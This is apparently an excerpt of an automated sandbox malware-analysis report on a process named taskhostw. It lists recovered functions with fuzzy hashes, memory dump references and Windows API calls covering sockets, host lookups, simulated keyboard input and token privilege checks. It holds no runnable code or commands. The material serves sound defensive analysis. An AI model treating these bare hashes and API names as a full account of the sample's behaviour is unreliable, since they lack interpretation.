                                                                  • Instruction ID: ec40e1d20d5e2609610486361c1a667e44e868497593627cf7c701bb08758bc9
                                                                  • Opcode Fuzzy Hash: 1a87b35778fb241c9227f0f33b7aec30126c43843cecd2f26141487188273ef9
                                                                  • Instruction Fuzzy Hash: 2E517E71880619AADF15EBA0CE81EEFF77AAF14300F600165E905720A1EF352E99DF64
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: 640e8c15ae52c3ad1599845e8d2a432b55e2b80ae749290df43cfa0727e9f0e5
                                                                  • Instruction ID: 0d13ca38fb207dfa1db85640e51a43c209b17516c22d70e054289944e5f658c3
                                                                  • Opcode Fuzzy Hash: 640e8c15ae52c3ad1599845e8d2a432b55e2b80ae749290df43cfa0727e9f0e5
                                                                  • Instruction Fuzzy Hash: FD419571700705AFDF288FA9CCC09AE7BB6AF44364B1689BDF805C7641DF709984AB48
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __write$__getbuf__getptd_noexit__lseeki64
                                                                  • String ID:
                                                                  • API String ID: 4182129353-0
                                                                  • Opcode ID: ef91125ff8c223d1a72b4a8ef83d5c35f483301ad284fd55d5e7f103683ae109
                                                                  • Instruction ID: 544899221d60816b2fa43b16f111e9c803c88e45ae37966ddbf1e572c963bc4b
                                                                  • Opcode Fuzzy Hash: ef91125ff8c223d1a72b4a8ef83d5c35f483301ad284fd55d5e7f103683ae109
                                                                  • Instruction Fuzzy Hash: 9C41E5B15007099FD738AF18C981A6A77E6AF41324F44862DE8A68B6D0EF38E9408F55
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00226AE7
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00226AF7
                                                                    • Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
                                                                    • Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C
                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00226B5B
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00226B67
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                  • String ID:
                                                                  • API String ID: 2214342067-0
                                                                  • Opcode ID: 1c44163ecdff459197ba9354874be241b7fe78ac9292175ec67038a84d959be4
                                                                  • Instruction ID: de4cb7a42cd384f90999040a8690420b9d207635705483bf24132c79d100ce81
                                                                  • Opcode Fuzzy Hash: 1c44163ecdff459197ba9354874be241b7fe78ac9292175ec67038a84d959be4
                                                                  • Instruction Fuzzy Hash: 6741B435740210AFEB10AF64DC8AF7A77E99B14B14F448058FA59AB2D2DB709C018751
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp
                                                                  • String ID:
                                                                  • API String ID: 856254489-0
                                                                  • Opcode ID: 855258f68d994c25f8440a18dc4a842d1637f7687e67efe119223d49f839d205
                                                                  • Instruction ID: 9540318f31d0fb369cba18c8cc32b14e41382907268987612f9cc93c31a83f90
                                                                  • Opcode Fuzzy Hash: 855258f68d994c25f8440a18dc4a842d1637f7687e67efe119223d49f839d205
                                                                  • Instruction Fuzzy Hash: 9131E8325002196ADF21EFB4DD89BEE77AC9F49324F5405B9E804D3091EF35DA88CB68
                                                                  APIs
                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0023F910), ref: 002265BD
                                                                  • _strlen.LIBCMT ref: 002265EF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen
                                                                  • String ID:
                                                                  • API String ID: 4218353326-0
                                                                  • Opcode ID: 9e654d2deb4512e107f4d0f696b416f6d18800ee08c624bdf5083831190d37b3
                                                                  • Instruction ID: ffff1603e3ea4e09990ef11127f8369558fc6fbb1b247c94d3522af5616535f3
                                                                  • Opcode Fuzzy Hash: 9e654d2deb4512e107f4d0f696b416f6d18800ee08c624bdf5083831190d37b3
                                                                  • Instruction Fuzzy Hash: 3041E231A10114AFCB14EBA4EDC9FFEB7ADAF58310F148119F9159B292DB34AD21CB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp
                                                                  • String ID:
                                                                  • API String ID: 856254489-0
                                                                  • Opcode ID: 6218bde2304efc4676ce77e9b54fce35e9b0c74d80cbfc74f25396fbf2f328d6
                                                                  • Instruction ID: a998d5688eafece03d96589fdc28a01c1d24b8c4d2e135df9dabee307af5e795
                                                                  • Opcode Fuzzy Hash: 6218bde2304efc4676ce77e9b54fce35e9b0c74d80cbfc74f25396fbf2f328d6
                                                                  • Instruction Fuzzy Hash: 28312A325002197ADF21EFB4DD98BDE77AC9F44224F6401A5EC00E20A2DF35DA94CB68
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00238910
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 2c512bc55e312b9e297fa43bf1134ad67510257875f9abecf8f36569c012ba73
                                                                  • Instruction ID: 7f5053387b0625af69271c8e78e1de5a07453792b8529c245f068529dc652efd
                                                                  • Opcode Fuzzy Hash: 2c512bc55e312b9e297fa43bf1134ad67510257875f9abecf8f36569c012ba73
                                                                  • Instruction Fuzzy Hash: 0F31D0B0621309BFEF219E58DC49BBD77A5EB06320F544115FA51EF3E1CF70A9A08A52
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 0023AB92
                                                                  • GetWindowRect.USER32(?,?), ref: 0023AC08
                                                                  • PtInRect.USER32(?,?,0023C07E), ref: 0023AC18
                                                                  • MessageBeep.USER32(00000000,?,?,?,?,0023C07E,?,?,?), ref: 0023AC89
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: ac415bd08acc4e694bf7d91aa9e8b30dbae80a1954cb4390d24b19ab1806d66a
                                                                  • Instruction ID: 8c078c269f019b7db9ba48af4909b2882149b6d97f37a69ac904faf4536c3371
                                                                  • Opcode Fuzzy Hash: ac415bd08acc4e694bf7d91aa9e8b30dbae80a1954cb4390d24b19ab1806d66a
                                                                  • Instruction Fuzzy Hash: 27418EB0A10115DFCF11CF59D888B99BBF6FB59300F1895BAE8988B260D770E891CF52
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00210E58
                                                                  • SetKeyboardState.USER32(00000080), ref: 00210E74
                                                                  • PostMessageW.USER32 ref: 00210EDA
                                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00210F2C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 717cda89b4d46b4bb61d7dc38be9c13c2b4ff13d51301e6092af39de0767f5ad
                                                                  • Instruction ID: 6c89dde6220c3d7118e1acadfcd1642e79d5ed7b605327276bd0c590ccde8db4
                                                                  • Opcode Fuzzy Hash: 717cda89b4d46b4bb61d7dc38be9c13c2b4ff13d51301e6092af39de0767f5ad
                                                                  • Instruction Fuzzy Hash: 8431573096020DAEFB318E268889BFA7BE9EB68310F18461AF490521D1C3F589E19751
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00210F97
                                                                  • SetKeyboardState.USER32(00000080), ref: 00210FB3
                                                                  • PostMessageW.USER32 ref: 00211012
                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00211064
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 21db4e8b5b9aa1a7b91a166a4fa9ef143c00b57204ef4b884dcfba3f575cebf0
                                                                  • Instruction ID: afb06f955b20dac1fd347961cef7a343bbfc2216178a58990d386abd86266850
                                                                  • Opcode Fuzzy Hash: 21db4e8b5b9aa1a7b91a166a4fa9ef143c00b57204ef4b884dcfba3f575cebf0
                                                                  • Instruction Fuzzy Hash: 95316E30D20399DEFF348E259C09BFA7BF5AB6C311F04421AE995511D1C3B589F197A1
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001E637B
                                                                  • __isleadbyte_l.LIBCMT ref: 001E63A9
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001E63D7
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001E640D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: a924e7941cfc4e7a2c6cb3e46c69cb92e86ce23b4ac84934a404cc90ae716de0
                                                                  • Instruction ID: 0cd062be77bd1a8053b484298cb2b54361017ecd5fd5c90e89db6188e241142c
                                                                  • Opcode Fuzzy Hash: a924e7941cfc4e7a2c6cb3e46c69cb92e86ce23b4ac84934a404cc90ae716de0
                                                                  • Instruction Fuzzy Hash: 3231AF31600A86EFDB258F66CC44AAE7BA5FF51390F554429F86887191E731EC50DB90
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 00234F6B
                                                                    • Part of subcall function 00213685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0021369F
                                                                    • Part of subcall function 00213685: GetCurrentThreadId.KERNEL32(00000000,?,002150AC), ref: 002136A6
                                                                    • Part of subcall function 00213685: AttachThreadInput.USER32(00000000,?,002150AC), ref: 002136AD
                                                                  • GetCaretPos.USER32(?), ref: 00234F7C
                                                                  • ClientToScreen.USER32(00000000,?), ref: 00234FB7
                                                                  • GetForegroundWindow.USER32 ref: 00234FBD
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: 22cca9ec9ad1bf8682a03a268a2196ad00865d3fd0599a0b9ffd6acb00871255
                                                                  • Instruction ID: 92c0ff5dbef8efaea3199964782af3330aeb7bf26bed50786b17fb7cf9443b16
                                                                  • Opcode Fuzzy Hash: 22cca9ec9ad1bf8682a03a268a2196ad00865d3fd0599a0b9ffd6acb00871255
                                                                  • Instruction Fuzzy Hash: 92314C72D10218AFCB00EFA5D9859EFB7FDEF99300F00406AE505E7201EB759E418BA0
                                                                  APIs
                                                                    • Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623
                                                                  • GetCursorPos.USER32(?), ref: 0023C53C
                                                                  • TrackPopupMenuEx.USER32 ref: 0023C551
                                                                  • GetCursorPos.USER32(?), ref: 0023C59E
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001EBB2B,?,?,?), ref: 0023C5D8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID:
                                                                  • API String ID: 2864067406-0
                                                                  • Opcode ID: e5eb889a2daf7b383d935f01b4f0e4c95bd6c7bd58fc438edf0f42ac99414a9a
                                                                  • Instruction ID: 2713d2415915e3f214f2f76ddc5682fcee585df4c06de7a53374313c965a015d
                                                                  • Opcode Fuzzy Hash: e5eb889a2daf7b383d935f01b4f0e4c95bd6c7bd58fc438edf0f42ac99414a9a
                                                                  • Instruction Fuzzy Hash: 4331F676610418EFCB15CF54D858EEABBF9EB49310F948069F909AB261C731AD60DFA0
                                                                  APIs
                                                                    • Part of subcall function 00208432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00208449
                                                                    • Part of subcall function 00208432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00208453
                                                                    • Part of subcall function 00208432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00208462
                                                                    • Part of subcall function 00208432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00208469
                                                                    • Part of subcall function 00208432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0020847F
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002089CB
                                                                  • _memcmp.LIBCMT ref: 002089EE
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00208A24
                                                                  • HeapFree.KERNEL32(00000000), ref: 00208A2B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                  • String ID:
                                                                  • API String ID: 1592001646-0
                                                                  • Opcode ID: 3f1c194063be9c8e897d6685d1f5bf2375bc07bcc6c53555d8a9207f4a9092b3
                                                                  • Instruction ID: ae72f5b8faab426fcc69c0efbff1de0d36e72cd850d4cc12b63112b7655add0e
                                                                  • Opcode Fuzzy Hash: 3f1c194063be9c8e897d6685d1f5bf2375bc07bcc6c53555d8a9207f4a9092b3
                                                                  • Instruction Fuzzy Hash: 35218931E50209ABCB10DFA4DA49BEEB7B8EF40301F04405AE494A7282DB30AA15CB51
                                                                  APIs
                                                                  • __setmode.LIBCMT ref: 001D0B2E
                                                                    • Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0021793F,?,?,00000000), ref: 001B5B8C
                                                                    • Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0021793F,?,?,00000000,?,?), ref: 001B5BB0
                                                                  • _fprintf.LIBCMT ref: 001D0B65
                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00206111
                                                                    • Part of subcall function 001D4C1A: _flsall.LIBCMT ref: 001D4C33
                                                                  • __setmode.LIBCMT ref: 001D0B9A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                  • String ID:
                                                                  • API String ID: 521402451-0
                                                                  • Opcode ID: e240bfef5261553217692ac7fe710d51255e56bb044e37011c76e5f4b858f63f
                                                                  • Instruction ID: fd932361cb674adb1a95e4e838cd1b12e5c321aa755e4ba0e5567c6e1826300b
                                                                  • Opcode Fuzzy Hash: e240bfef5261553217692ac7fe710d51255e56bb044e37011c76e5f4b858f63f
                                                                  • Instruction Fuzzy Hash: 941127329082047FDB0577B4AC46AFE7B6E9F65320F14011BF105A72D2DF7158924795
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 001B4560
                                                                    • Part of subcall function 001B410D: _memset.LIBCMT ref: 001B418D
                                                                    • Part of subcall function 001B410D: _wcscpy.LIBCMT ref: 001B41E1
                                                                    • Part of subcall function 001B410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001B41F1
                                                                  • KillTimer.USER32 ref: 001B45B5
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001B45C4
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001ED5FE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1378193009-0
                                                                  • Opcode ID: 8311d244682857cbc78bc7b8e6c1a3eef7b3f3fca1dd04eaa5dc3980d75ee950
                                                                  • Instruction ID: f04b83a36f8cd6fcb293ad2a1bf06822dae42b0794aaadcb9c3949a977a54a9c
                                                                  • Opcode Fuzzy Hash: 8311d244682857cbc78bc7b8e6c1a3eef7b3f3fca1dd04eaa5dc3980d75ee950
                                                                  • Instruction Fuzzy Hash: 4E21DA70904B849FE7328B24E859BEBBBEC9F11308F04409DE69E56242D7741985CB51
                                                                  APIs
                                                                    • Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0021793F,?,?,00000000), ref: 001B5B8C
                                                                    • Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0021793F,?,?,00000000,?,?), ref: 001B5BB0
                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 002264AF
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002264BA
                                                                  • _memmove.LIBCMT ref: 002264E7
                                                                  • inet_ntoa.WSOCK32(?), ref: 002264F2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 1504782959-0
                                                                  • Opcode ID: 239a2ca45bf5b6252dbd7afc66ab331bd95045ebbe17b406671b6803bb516e72
